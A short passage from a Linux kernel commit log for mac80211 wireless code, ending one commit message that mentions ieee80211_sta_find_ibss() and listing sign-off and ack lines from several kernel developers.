    which will invoke ieee80211_sta_find_ibss() (if that is
    appropriate in the current state).

    Signed-off-by: Johannes Berg
    Signed-off-by: John W. Linville

    Johannes Berg
     
  • Signed-off-by: Felix Fietkau
    Acked-by: Johannes Berg
    Signed-off-by: John W. Linville

    Felix Fietkau